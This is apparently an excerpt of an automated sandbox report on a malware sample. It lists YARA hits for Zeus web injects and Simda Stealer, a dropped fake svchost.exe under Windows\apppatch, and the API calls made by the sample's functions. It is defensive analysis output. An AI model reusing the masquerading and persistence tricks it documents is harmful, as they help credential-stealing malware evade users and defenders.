Source: 00000002.00000003.2757164455.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2775825052.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2168388667.0000000000881000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2776041284.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2790907170.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2794030784.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2774710797.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2170461210.0000000002A50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2792838901.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2773445866.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2791900704.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2789409871.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2784224437.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2790002799.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0000001B.00000002.2728043702.0000000003040000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000006.00000002.2605946728.0000000001240000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0000000B.00000002.2639594297.0000000002EA0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2810131303.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000009.00000002.2610520727.00000000009C0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000027.00000002.2872659642.0000000000D30000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2707114238.0000000003C40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2678865886.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: Process Memory Space: UMwpXhA46R.exe PID: 7020, type: MEMORYSTRMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: Process Memory Space: svchost.exe PID: 1112, type: MEMORYSTRMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: Process Memory Space: PMnAVsjMPucERAKEWNFImySCFHoLk.exe PID: 6912, type: MEMORYSTRMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: Process Memory Space: PMnAVsjMPucERAKEWNFImySCFHoLk.exe PID: 1220, type: MEMORYSTRMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: Process Memory Space: PMnAVsjMPucERAKEWNFImySCFHoLk.exe PID: 2268, type: MEMORYSTRMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: Process Memory Space: PMnAVsjMPucERAKEWNFImySCFHoLk.exe PID: 3472, type: MEMORYSTRMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: Process Memory Space: PMnAVsjMPucERAKEWNFImySCFHoLk.exe PID: 1492, type: MEMORYSTRMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: Process Memory Space: PMnAVsjMPucERAKEWNFImySCFHoLk.exe PID: 6628, type: MEMORYSTRMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: Process Memory Space: PMnAVsjMPucERAKEWNFImySCFHoLk.exe PID: 5128, type: MEMORYSTRMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: Process Memory Space: PMnAVsjMPucERAKEWNFImySCFHoLk.exe PID: 2948, type: MEMORYSTRMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: Process Memory Space: PMnAVsjMPucERAKEWNFImySCFHoLk.exe PID: 3416, type: MEMORYSTRMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: Process Memory Space: PMnAVsjMPucERAKEWNFImySCFHoLk.exe PID: 3328, type: MEMORYSTRMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: Process Memory Space: PMnAVsjMPucERAKEWNFImySCFHoLk.exe PID: 3896, type: MEMORYSTRMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: Process Memory Space: PMnAVsjMPucERAKEWNFImySCFHoLk.exe PID: 6212, type: MEMORYSTRMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: Process Memory Space: PMnAVsjMPucERAKEWNFImySCFHoLk.exe PID: 1476, type: MEMORYSTRMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Yara detected Simda Stealer
Source: Yara matchFile source: 2.3.svchost.exe.881000.5.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 2.3.svchost.exe.881000.1.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 0.3.UMwpXhA46R.exe.7031e8.2.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 0.2.UMwpXhA46R.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 0.2.UMwpXhA46R.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 00000002.00000002.3402365018.0000000000400000.00000040.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000003.2148607507.0000000000703000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara matchFile source: 00000002.00000003.2168260986.0000000000881000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000002.2153786552.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara matchFile source: 00000002.00000003.2168388667.0000000000881000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara matchFile source: Process Memory Space: UMwpXhA46R.exe PID: 7020, type: MEMORYSTR
Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 1112, type: MEMORYSTR
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02C76A30 NtQuerySystemInformation,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,_snprintf,memset,_snprintf,OpenMutexA,2_2_02C76A30
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02C73940 VirtualQuery,VirtualQuery,VirtualQuery,VirtualQuery,VirtualAlloc,SymSetOptions,GetCurrentProcess,GetCurrentProcess,SymInitialize,GetCurrentProcess,GetLastError,_snprintf,GetCurrentThread,ZwQueryInformationThread,GetCurrentProcess,GetCurrentProcess,PathAddBackslashA,PathAddBackslashA,PathAddBackslashA,PathAddBackslashA,GetDateFormatA,GetTimeFormatA,_snprintf,PathAddBackslashA,PathAddBackslashA,PathAddBackslashA,VirtualFree,2_2_02C73940
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 6_2_01243940 VirtualQuery,LdrInitializeThunk,VirtualQuery,LdrInitializeThunk,VirtualQuery,LdrInitializeThunk,VirtualQuery,VirtualAlloc,SymSetOptions,GetCurrentProcess,GetCurrentProcess,SymInitialize,GetCurrentProcess,GetLastError,_snprintf,GetCurrentThread,ZwQueryInformationThread,GetCurrentProcess,GetCurrentProcess,PathAddBackslashA,PathAddBackslashA,PathAddBackslashA,PathAddBackslashA,GetDateFormatA,GetTimeFormatA,_snprintf,PathAddBackslashA,PathAddBackslashA,PathAddBackslashA,VirtualFree,6_2_01243940
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 7_2_01043940 VirtualQuery,LdrInitializeThunk,VirtualQuery,LdrInitializeThunk,VirtualQuery,LdrInitializeThunk,VirtualQuery,VirtualAlloc,SymSetOptions,GetCurrentProcess,GetCurrentProcess,SymInitialize,GetCurrentProcess,GetLastError,_snprintf,GetCurrentThread,ZwQueryInformationThread,GetCurrentProcess,GetCurrentProcess,PathAddBackslashA,PathAddBackslashA,PathAddBackslashA,PathAddBackslashA,GetDateFormatA,GetTimeFormatA,_snprintf,PathAddBackslashA,PathAddBackslashA,PathAddBackslashA,VirtualFree,7_2_01043940
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 9_2_00A23940 VirtualQuery,LdrInitializeThunk,VirtualQuery,LdrInitializeThunk,VirtualQuery,LdrInitializeThunk,VirtualQuery,VirtualAlloc,SymSetOptions,GetCurrentProcess,GetCurrentProcess,SymInitialize,GetCurrentProcess,GetLastError,_snprintf,GetCurrentThread,ZwQueryInformationThread,GetCurrentProcess,GetCurrentProcess,PathAddBackslashA,PathAddBackslashA,PathAddBackslashA,PathAddBackslashA,GetDateFormatA,GetTimeFormatA,_snprintf,PathAddBackslashA,PathAddBackslashA,PathAddBackslashA,VirtualFree,9_2_00A23940
Source: C:\Users\user\Desktop\UMwpXhA46R.exeCode function: 0_2_004020B0: CreateFileA,VirtualAlloc,DeviceIoControl,CloseHandle,0_2_004020B0
Source: C:\Users\user\Desktop\UMwpXhA46R.exeCode function: 0_2_004017F0 _snprintf,memset,MultiByteToWideChar,GetProcessHeap,GetProcessHeap,HeapAlloc,memset,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,GetProcessHeap,HeapAlloc,memset,MultiByteToWideChar,MultiByteToWideChar,GetProcessHeap,HeapAlloc,memset,MultiByteToWideChar,GetProcessHeap,CreateProcessWithLogonW,GetProcessHeap,HeapValidate,HeapValidate,GetProcessHeap,HeapFree,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,0_2_004017F0
Source: C:\Users\user\Desktop\UMwpXhA46R.exeFile created: C:\Windows\apppatch\svchost.exeJump to behavior
Source: C:\Users\user\Desktop\UMwpXhA46R.exeFile created: C:\Windows\apppatch\svchost.exe\:Zone.Identifier:$DATAJump to behavior
Source: C:\Users\user\Desktop\UMwpXhA46R.exeCode function: 0_2_004339800_2_00433980
Source: C:\Users\user\Desktop\UMwpXhA46R.exeCode function: 0_2_0043F1900_2_0043F190
Source: C:\Users\user\Desktop\UMwpXhA46R.exeCode function: 0_2_0044599D0_2_0044599D
Source: C:\Users\user\Desktop\UMwpXhA46R.exeCode function: 0_2_0040DA500_2_0040DA50
Source: C:\Users\user\Desktop\UMwpXhA46R.exeCode function: 0_2_004422500_2_00442250
Source: C:\Users\user\Desktop\UMwpXhA46R.exeCode function: 0_2_00440A600_2_00440A60
Source: C:\Users\user\Desktop\UMwpXhA46R.exeCode function: 0_2_004442800_2_00444280
Source: C:\Users\user\Desktop\UMwpXhA46R.exeCode function: 0_2_0043E3400_2_0043E340
Source: C:\Users\user\Desktop\UMwpXhA46R.exeCode function: 0_2_004483600_2_00448360
Source: C:\Users\user\Desktop\UMwpXhA46R.exeCode function: 0_2_004223800_2_00422380
Source: C:\Users\user\Desktop\UMwpXhA46R.exeCode function: 0_2_00439B900_2_00439B90
Source: C:\Users\user\Desktop\UMwpXhA46R.exeCode function: 0_2_00443BB00_2_00443BB0
Source: C:\Users\user\Desktop\UMwpXhA46R.exeCode function: 0_2_004434E00_2_004434E0
Source: C:\Users\user\Desktop\UMwpXhA46R.exeCode function: 0_2_0043A4F00_2_0043A4F0
Source: C:\Users\user\Desktop\UMwpXhA46R.exeCode function: 0_2_0040DDA00_2_0040DDA0
Source: C:\Users\user\Desktop\UMwpXhA46R.exeCode function: 0_2_0043FE000_2_0043FE00
Source: C:\Users\user\Desktop\UMwpXhA46R.exeCode function: 0_2_004416C00_2_004416C0
Source: C:\Users\user\Desktop\UMwpXhA46R.exeCode function: 0_2_0043A6D00_2_0043A6D0
Source: C:\Users\user\Desktop\UMwpXhA46R.exeCode function: 0_2_004386F00_2_004386F0
Source: C:\Users\user\Desktop\UMwpXhA46R.exeCode function: 0_2_0042CF600_2_0042CF60
Source: C:\Users\user\Desktop\UMwpXhA46R.exeCode function: 0_2_0040DFC00_2_0040DFC0
Source: C:\Users\user\Desktop\UMwpXhA46R.exeCode function: 0_2_0044BFE30_2_0044BFE3
Source: C:\Users\user\Desktop\UMwpXhA46R.exeCode function: 0_2_00408FB00_2_00408FB0
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_004339802_2_00433980
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_0043F1902_2_0043F190
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_0044599D2_2_0044599D
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_0040DA502_2_0040DA50
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_004422502_2_00442250
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_00440A602_2_00440A60
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_004442802_2_00444280
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_0043E3402_2_0043E340
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_004483602_2_00448360
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_004223802_2_00422380
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_00439B902_2_00439B90
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_00443BB02_2_00443BB0
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_004434E02_2_004434E0
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_0043A4F02_2_0043A4F0
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_0040DDA02_2_0040DDA0
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_0043FE002_2_0043FE00
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_004416C02_2_004416C0
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_0043A6D02_2_0043A6D0
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_004386F02_2_004386F0
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_0042CF602_2_0042CF60
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_0040DFC02_2_0040DFC0
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_0044BFE32_2_0044BFE3
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_00408FB02_2_00408FB0
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02C72BB02_2_02C72BB0
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02CAB2C02_2_02CAB2C0
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02CA42D02_2_02CA42D0
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02CA22F02_2_02CA22F0
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02CAF2402_2_02CAF240
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02CA9A002_2_02CA9A00
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02C77BC02_2_02C77BC0
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02C96B602_2_02C96B60
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02CAD0E02_2_02CAD0E0
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02CA40F02_2_02CA40F0
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02CB61E32_2_02CB61E3
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02C779A02_2_02C779A0
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02CADE802_2_02CADE80
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02C776502_2_02C77650
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02CABE502_2_02CABE50
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02CAA6602_2_02CAA660
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02C8BF802_2_02C8BF80
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02CA37902_2_02CA3790
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02CAD7B02_2_02CAD7B0
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02CA7F402_2_02CA7F40
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02CB1F602_2_02CB1F60
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02C9D5802_2_02C9D580
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02CA8D902_2_02CA8D90
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_029DF2802_2_029DF280
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_029A8A502_2_029A8A50
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_029DD2502_2_029DD250
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_029DBA602_2_029DBA60
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_029D4B902_2_029D4B90
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_029BD3802_2_029BD380
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_029DEBB02_2_029DEBB0
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_029D93402_2_029D9340
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_029E33602_2_029E3360
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_029E099D2_2_029E099D
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_029DA1902_2_029DA190
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_029CE9802_2_029CE980
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_029D56D02_2_029D56D0
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_029DC6C02_2_029DC6C0
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_029D36F02_2_029D36F0
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_029DAE002_2_029DAE00
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_029A3FB02_2_029A3FB0
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_029A8FC02_2_029A8FC0
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_029E6FE32_2_029E6FE3
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_029C7F602_2_029C7F60
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_029D54F02_2_029D54F0
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_029DE4E02_2_029DE4E0
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_029A8DA02_2_029A8DA0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 6_2_012479A06_2_012479A0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 6_2_012861E36_2_012861E3
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 6_2_0127D0E06_2_0127D0E0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 6_2_012740F06_2_012740F0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 6_2_01266B606_2_01266B60
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 6_2_01242BB06_2_01242BB0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 6_2_01247BC06_2_01247BC0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 6_2_01279A006_2_01279A00
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 6_2_0127F2406_2_0127F240
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 6_2_012722F06_2_012722F0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 6_2_0127B2C06_2_0127B2C0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 6_2_012742D06_2_012742D0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 6_2_0126D5806_2_0126D580
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 6_2_01278D906_2_01278D90
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 6_2_01281F606_2_01281F60
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 6_2_01277F406_2_01277F40
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 6_2_0127D7B06_2_0127D7B0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 6_2_0125BF806_2_0125BF80
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 6_2_012737906_2_01273790
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 6_2_0127A6606_2_0127A660
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 6_2_012476506_2_01247650
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 6_2_0127BE506_2_0127BE50
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 6_2_0127DE806_2_0127DE80
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 6_2_0120E9806_2_0120E980
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 6_2_0121A1906_2_0121A190
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 6_2_0122099D6_2_0122099D
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 6_2_012233606_2_01223360
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 6_2_012193406_2_01219340
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 6_2_0121EBB06_2_0121EBB0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 6_2_011FD3806_2_011FD380
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 6_2_01214B906_2_01214B90
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 6_2_0121BA606_2_0121BA60
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 6_2_011E8A506_2_011E8A50
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 6_2_0121D2506_2_0121D250
